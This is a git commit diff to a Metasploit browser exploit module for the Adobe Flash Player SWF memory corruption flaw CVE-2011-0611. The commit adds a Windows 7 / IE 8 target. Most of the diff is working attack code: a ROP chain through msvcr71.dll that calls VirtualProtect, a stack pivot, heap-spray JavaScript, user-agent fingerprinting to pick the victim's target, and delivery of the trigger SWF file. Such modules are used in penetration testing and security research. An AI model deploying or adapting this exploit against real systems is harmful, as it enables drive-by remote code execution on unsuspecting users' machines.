Add Windows 7 target and all kinds of stuff.

git-svn-id: file:///home/svn/framework3/trunk@13775 4d416f70-5f16-0410-b530-b9f4589650da
2011-09-22 17:40:35 +00:00 · 2011-09-22 17:40:35 +00:00 · ec6f290fbd
parent 5c41385284
commit ec6f290fbd
1 changed files with 145 additions and 111 deletions
--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@ -20,12 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",
 			'Description'    => %q{
-					This module exploits a vulnerability in Adobe Flash Player that was discovered, and
-				has been exploited actively in the wild.  By embedding a specially crafted .swf file,
-				Adobe Flash crashes due to an invalid use of an object type, which allows attackers to
-				overwrite a pointer in memory, and results arbitrary code execution.  Please note for
-				IE 8 targets, mscorie.dll (a .Net component)  must be available on the victim machine
-				in order to work properly.
+					This module exploits a vulnerability in Adobe Flash Player that was discovered,
+				and has been exploited actively in the wild.  By embedding a specially crafted .swf
+				file, Adobe Flash crashes due to an invalid use of an object type, which allows
+				attackers to overwrite a pointer in memory, and results arbitrary code execution.
+				Please note for IE 8 targets, Java Runtime Environment must be available on the
+				victim machine in order to work properly.
 			},
 			'License'        => MSF_LICENSE,
 			'Version'        => "$Revision$",
@ -58,10 +58,61 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'        =>
 				[
 					[ 'Automatic', {} ],
-					[ 'IE 6 on Windows XP SP3', { 'Rop' => false } ],
-					[ 'IE 7 on Windows XP SP3', { 'Rop' => false } ],
-					[ 'IE 8 on Windows XP SP3', { 'Rop' => true  } ],
-					[ 'IE 7 on Windows Vista',  { 'Rop' => false } ],
+					[
+						'IE 6 on Windows XP SP3',
+						{
+							'Rop'     => false,
+							'Pivot'   => nil,         #No ROP no pivot
+							'Offset1' => '0x01',      #For aligning the payload
+							'Offset2' => '0x02',      #For aligning the CALL
+							'Max1'    => '0x150',     #First spray
+							'Max2'    => '0x200'      #Second spray
+						}
+					],
+					[
+						'IE 7 on Windows XP SP3',
+						{
+							'Rop'     => false,
+							'Pivot'   => nil,         #No ROP no pivot
+							'Offset1' => '0x01',      #For aligning the payload
+							'Offset2' => '0x02',      #For aligning the CALL
+							'Max1'    => '0x150',     #First spray
+							'Max2'    => '0x200'      #Second spray
+						}
+					],
+					[
+						'IE 8 on Windows XP SP3',
+						{
+							'Rop'     => true,
+							'Pivot'   => 0x7c348b05,  #XCHG EAX,ESP; RETN (MSVCR71.dll)
+							'Offset1' => '0x5E2',     #Offset for rop+payload
+							'Offset2' => '0x02',      #Offset to 0x11111110
+							'Max1'    => '0x250',     #First spray
+							'Max2'    => '0x200'      #Second spray
+						}
+					],
+					[
+						'IE 7 on Windows Vista',
+						{
+							'Rop'     => false,
+							'Pivot'   => nil,         #No ROP no pivot
+							'Offset1' => '0x01',      #For aligning the payload
+							'Offset2' => '0x02',      #For aligning the CALL
+							'Max1'    => '0x150',     #First spray
+							'Max2'    => '0x200'      #Second spray
+						}
+					],
+					[
+						'IE 8 on Windows 7',
+						{
+							'Rop'     => true,
+							'Pivot'   => 0x7c348b05,  #XCHG EAX,ESP; RETN (MSVCR71.dll)
+							'Offset1' => '0x5F4',     #Offset for rop+payload
+							'Offset2' => '0x02',      #Offset to 0x11111110
+							'Max1'    => '0x150',     #First spray
+							'Max2'    => '0x200'      #Second spray
+						}
+					]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Apr 11 2011",
@ -75,12 +126,10 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def exploit
-		#Load the trigger file
 		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2011-0611.swf")
 		f = File.open(path, "rb")
 		@trigger = f.read(f.stat.size)
 		f.close
-
 		super
 	end

@ -93,21 +142,20 @@ class Metasploit3 < Msf::Exploit::Remote
 		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
 			#Windows XP SP3 + IE 7.0
 			return targets[2]
-		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ and agent =~ /\.NET CLR 2\.0/
-			#Windows XP SP3 + IE 8.0 + .Net CLR 2.0
+		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
+			#Windows XP SP3 + IE 8.0 + JRE6
 			return targets[3]
 		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
 			#Windows Vista + IE 7
 			return targets[4]
+		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
+			#Windows 7 + IE 8 + JRE6
+			return targets[5]
 		else
 			return nil
 		end
 	end

-	def junk
-		return rand_text_alpha(4).unpack("L")[0].to_i
-	end
-
 	def on_request_uri(cli, request)
 		#Set default target
 		my_target = target
@ -115,118 +163,104 @@ class Metasploit3 < Msf::Exploit::Remote
 		#If user chooses automatic target, we choose one based on user agent
 		if my_target.name =~ /Automatic/
 			my_target = get_target(request)
-
-			#No suitable target, we go ninja mode
 			if my_target.nil?
 				send_not_found(cli)
 				print_error("#{cli.peerhost}:#{cli.peerport} Unknown user-agent")
 				return
 			end
-
-			print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
+			vprint_status("Target selected: #{my_target.name}")
 		end

-		uri = request.uri
-		print_status("URL: #{uri}") if datastore['VERBOSE']
+		vprint_status("URL: #{request.uri}")

-		if uri =~ /\.swf$/
+		if request.uri =~ /\.swf$/
 			#Browser requests our trigger file, why not
 			print_status("Sending trigger SWF to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )
 			return
-		elsif uri =~ /\.dll$/
-			#Throw the browser a fake .Net DLL so mscorie.dll will load
-			print_status("Sending .NET dll to #{cli.peerhost}:#{cli.peerport}...")
-			ibase = (0x2000 | rand(0x8000)) << 16
-
-			#Generate our .Net DLL with random data
-			dll = Msf::Util::EXE.to_dotnetmem(ibase, rand_text(16))
-
-			#Generate our headers for the browser to download the dll
-			headers = {
-				'Content-Type' => 'application/x-msdownload',
-				'Connection'   => 'close',
-				'Pragma'       => 'no-cache'
-			}
-
-			send_response(cli, dll, headers)
-			return
 		end

-		#The type of arch our victim machine is running
+		#Targets that don't need ROP
+		rop    = ''
+		pivot  = "\xb8\x0c\x0c\x0c\x0c"  #MOV EAX,0x0c0c0c0c
+		pivot << "\xff\xe0"              #JMP EAX
+		pivot << "\x41"                  #Pad
+
+		#Targets that need ROP
+		if my_target['Rop']
+			#Target Addr=0x0c0c0c0c
+			rop = 
+			[
+				0x7c376402,  # POP EBP # RETN [msvcr71.dll]
+				0x7c376402,  # skip 4 bytes [msvcr71.dll]
+				0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
+				0xfffff800,  # Value to negate, will become 0x00000201 (dwSize)
+				0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]
+				0x7c354901,  # POP EBX # RETN [msvcr71.dll]
+				0xffffffff,
+				0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
+				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
+				0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
+				0xffffffc0,  # Value to negate, will become 0x00000040
+				0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
+				0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
+				0x7c38b001,  # &Writable location [msvcr71.dll]
+				0x7c34b8d7,  # POP EDI # RETN [msvcr71.dll]
+				0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
+				0x7c364802,  # POP ESI # RETN [msvcr71.dll]
+				0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
+				0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
+				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
+				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 
+				0x7c345c30,  # ptr to 'push esp #  ret ' [msvcr71.dll]
+			].pack("V*")
+
+			#Target Addr=0x11111110
+			pivot =
+			[
+				0x0c0c0c0c,          # Padding. Value for ESP after the XCHG pivot
+				my_target['Pivot'],  # ROP Pivot
+				0x7c346b52,          # EAX (POP ESP; RETN)
+			].pack('V*')
+		end
+
 		arch = Rex::Arch.endian(my_target.arch)

-		if my_target['Rop']
-			#DEP is enabled, rop it like a rop star
-			net_dll_name = "#{get_resource}/generic-" + Time.now.to_i.to_s + ".dll"
-			js_net_dll = "<object classid=\"#{net_dll_name}\"#GenericControl\"></object>"
-
-			#Land it exactly at 0x11111110
-			rop =
-			[
-				0x63F031D8,  #POP ECX; POP ESI; RETN
-				junk,
-				0x7E451509,  #XCHG EAX,ESP; RETN in USER32
-				0x63f04d74,  #CALL mscorie!_imp_VirtualProtect
-				0x11111138,  #Param: shellcode (Target address = 0x11111110+0x24)
-				0x900,       #Param: size (2304)
-				0x40,        #Param: newProtect
-				0x11111110,  #Param: oldProtect
-				0x11111138,  #RETN (Target address = 0x11111110+0x24)
-				junk,
-			].pack('V*')
-
-			#Our payload will land at 11111110
-			shellcode = Rex::Text.to_unescape(rop + payload.encoded, arch)
-			nops = Rex::Text.to_unescape(rand_text_alpha(4), arch)
-
-			#Heap spray routine
-			js = <<-JS
-			var heap_obj = new heapLib.ie(0x20000);
-			var code = unescape("#{shellcode}");
-			var nops = unescape("#{nops}");
-
-			while (nops.length < 0x1000) nops += nops;
-			offset = nops.substring(0, 0x62);
-			var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
-
-			while (shellcode.length < 0x20000) shellcode += shellcode;
-			block = shellcode.substring(0, (0x10000-6)/2);
-
-			heap_obj.gc();
-
-			for (var i=0; i < 0x1000; i++) {
-				heap_obj.alloc(block);
-			}
-			JS
+		p = rop + payload.encoded
+		shellcode = Rex::Text.to_unescape(p, arch)
+		pivot = Rex::Text.to_unescape(pivot, arch)

+		#Extract string based on target
+		if my_target.name == 'IE 8 on Windows 7'
+			js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
+		elsif my_target.name == 'IE 8 on Windows XP SP3'
+			js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
 		else
-			#No DEP, giggity. 0x0c0c0c0c is our target address
-			nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
-			shellcode = Rex::Text.to_unescape(payload.encoded, arch)
-
-			#Heap spray routine
-			js = <<-JS
-			var heap_obj = new heapLib.ie(0x20000);
-			var code = unescape("#{shellcode}");
-			var nops = unescape("#{nops}");
-
-			while (nops.length < 0x1000) nops += nops;
-			var shellcode = nops.substring(0, 0x1000-code.length) + code;
-
-			while (shellcode.length < 0x20000) shellcode += shellcode;
-			block = shellcode.substring(0, (0x10000-6)/2);
-
-			heap_obj.gc();
-
-			for (var i=0; i < 0x1000; i++) {
-				heap_obj.alloc(block);
-			}
-			JS
+			js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
 		end

-		#Implement heaplib
-		js = heaplib(js)
+		js = <<-JS
+		function heap_spray(heaplib, nops, code, offset, max) {
+			while (nops.length < 0x2000) nops += nops;
+			var offset = nops.substring(0, offset);
+			var shellcode = offset + code + nops.substring(0, 0x2000-code.length-offset.length);
+			while (shellcode.length < 0x40000) shellcode += shellcode;
+			#{js_extract_str}
+			heaplib.gc();
+			for (var i=1; i<max; i++) {
+				heaplib.alloc(block);
+			}
+		}
+
+		var heap_obj = new heapLib.ie(0x20000);
+		var nops = unescape("%u0c0c%u0c0c");
+		var code = unescape("#{shellcode}");
+		heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});
+		var fake_pointers = unescape("#{pivot}");
+		heap_spray(heap_obj, fake_pointers, fake_pointers, #{my_target['Offset2']}, #{my_target['Max2']});
+		JS
+
+		js = heaplib(js, {:noobfu => true} )

 		#Javascript obfuscation is optional
 		if datastore['OBFUSCATE']
@ -244,7 +278,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		</script>
 		</head>
 		<body>
-		#{js_net_dll}
 		<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"
 		codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
 		<param name="movie" value="#{trigger_file_name}" />
@ -279,4 +312,5 @@ Flash10o+0xd01f6:
 01d65100  00000000 00000000 00000000 00000000
 01d65110  00000000 00000000 00000000 00000000
 01d65120  00000000 00000000 00000000 00000000
+
 =end